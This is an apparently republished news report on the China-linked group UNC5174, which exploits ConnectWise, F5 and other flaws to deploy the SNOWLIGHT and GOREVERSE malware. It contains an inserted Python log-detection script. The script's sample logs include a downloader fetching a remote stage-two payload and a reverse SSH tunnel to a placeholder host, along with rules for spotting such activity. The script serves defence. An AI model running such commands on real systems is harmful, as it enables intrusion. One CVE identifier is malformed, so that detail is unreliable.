
    China-Linked Group disrupts network via Connectwise, F5 software flaws

By techempire

Report | March 22, 2024 | Editorial Department | Cyber Defense/Vulnerabilities

    Connectwise, F5 software defects

A China-linked threat cluster is exploiting security flaws in ConnectWise ScreenConnect and F5 BIG-IP software to deliver custom malware capable of dropping additional backdoors on infected Linux hosts as part of an “offensive” campaign.

Google-owned Mandiant is tracking the activity under the uncategorized name UNC5174 (also known as Uteus or Uetus) and describes the actor as “a former member of a Chinese hacktivist group that has since shown signs of acting as a contractor for China’s Ministry of State Security (MSS) focused on performing access operations.”

The threat actor is believed to have orchestrated attacks targeting Southeast Asian and US research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs) between October and November 2023, and again in February 2024 in a widespread attack using the ScreenConnect bug.


Initial access is gained by exploiting Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), the Linux kernel (CVE-2022-0185), and Zyxel (CVE 3052).

After successfully establishing a foothold, the actor performs extensive reconnaissance and scanning of Internet-facing systems to find security vulnerabilities. UNC5174 also creates administrative user accounts to perform malicious actions with elevated privileges, including the deployment of a C-based ELF downloader named SNOWLIGHT.

SNOWLIGHT is designed to download the next-stage payload, an obfuscated Golang backdoor called GOREVERSE, from a remote URL associated with SUPERSHELL, an open-source command-and-control (C2) framework that allows attackers to establish reverse SSH tunnels and start an interactive shell session to execute arbitrary code.

The threat actor also uses the Golang-based tunneling tool GOHEAVY, which is likely used to facilitate lateral movement within infected networks, as well as other programs such as afrog, DirBuster, Metasploit, Sliver, and sqlmap.
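The post-exploitation steps described above (new privileged accounts, a downloader executed from a scratch directory, reverse SSH tunnels) are the kind of host activity a defender can flag from Linux auth and process-audit logs. The following detection sketch is an added example, not code from the report or from Mandiant; the log lines, the account name, the binary path and the 203.0.113.x / 10.0.0.x addresses are all constructed placeholders, and the audit line format is a simplified assumption.

```python
import re
from typing import Dict, List

# Constructed sample records (not from the report). They mimic Linux
# auth.log entries plus a simplified, assumed process-exec audit line.
SAMPLE_LOGS = [
    "Mar 22 10:01:02 host useradd[2211]: new user: name=svc_backup, UID=1007, GID=1007, home=/home/svc_backup, shell=/bin/bash",
    "Mar 22 10:01:05 host usermod[2214]: add 'svc_backup' to group 'sudo'",
    "Mar 22 10:02:11 host execve: uid=0 cmd=/tmp/.cache/dl -u http://203.0.113.10/stage2",
    "Mar 22 10:02:30 host execve: uid=1007 cmd=ssh -fN -R 2222:localhost:22 ops@203.0.113.10",
    "Mar 22 10:05:00 host execve: uid=1000 cmd=ssh -L 8080:intranet:80 user@10.0.0.5",
    "Mar 22 10:06:00 host useradd[2300]: new user: name=deploy, UID=1008, GID=1008, home=/home/deploy, shell=/bin/bash",
]

ADMIN_GROUPS = {"sudo", "wheel", "admin", "root"}
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=(\S+?), UID=(\d+)")
GROUP_ADD_RE = re.compile(r"usermod\[\d+\]: add '(\S+)' to group '(\S+)'")
EXEC_RE = re.compile(r"execve: uid=(\d+) cmd=(.+)$")


def has_reverse_forward(argv: List[str]) -> bool:
    """True if an ssh argv carries -R (also when bundled, e.g. -fNR)."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return False
    for tok in argv[1:]:
        if tok.startswith("-") and not tok.startswith("--") and "R" in tok[1:]:
            return True
        if "@" in tok and not tok.startswith("-"):
            break  # reached user@host; anything after is the remote command
    return False


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Apply rules for the reported post-exploitation steps to each log line."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = NEW_USER_RE.search(line)
        if m and m.group(2) == "0":
            hits.append({"rule": "uid0_account", "line": line})
        m = GROUP_ADD_RE.search(line)
        if m and m.group(2) in ADMIN_GROUPS:
            hits.append({"rule": "admin_group_add", "line": line})
        m = EXEC_RE.search(line)
        if m:
            argv = m.group(2).split()
            if argv[0].startswith(SUSPICIOUS_DIRS):
                hits.append({"rule": "exec_from_tmp", "line": line})
            if has_reverse_forward(argv):
                hits.append({"rule": "reverse_ssh_tunnel", "line": line})
    return hits
```

Running `detect(SAMPLE_LOGS)` flags the sudo-group addition, the execution out of /tmp and the -R tunnel, while the ordinary -L forward and the unprivileged account creation pass.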


In an unusual instance uncovered by the threat intelligence firm, the threat actor was found to have applied mitigations for CVE-2023-46747, possibly in an attempt to prevent other, unrelated adversaries from weaponizing the same vulnerability to gain access.

Mandiant’s assessment: “UNC5174 (aka Uteus) was a member of the Chinese hacker group ‘Dawn Calvary’ and has worked with ‘Genesis Day’/‘Xiaoqiying’ and ‘Teng Snake’.” “This individual appears to have left these organizations in mid-2023 and has since been focused on performing access operations with the goal of proxying access to compromised environments.”

There is evidence that the threat actor may have been an initial access broker supported by the MSS, as claimed on dark web forums. This is further supported by the fact that a number of US defense and UK government entities were simultaneously targeted by another access broker named UNC302.


    These findings once again highlight the ongoing efforts of Chinese nation-state groups to compromise edge devices by rapidly incorporating recently disclosed vulnerabilities into their arsenal in order to conduct cyber espionage at scale.

    “UNC5174 was observed attempting to sell access to US defense contractor equipment, UK government entities, and Asian agencies in late 2023 after exploiting CVE-2023-46747,” Mandiant researchers said.

“There are similarities between UNC5174 and UNC302, which suggests they are operating within the MSS initial access broker environment. These similarities suggest there may be shared vulnerabilities and operational priorities between these threat actors, although further investigation is required to determine the final attribution.”

    The disclosure came as the Ministry of State Security warned that an unnamed foreign hacker group had used phishing emails and known security flaws to breach networks and infiltrate “hundreds” of Chinese businesses and government organizations. It did not reveal the name or origin of the threat actor.
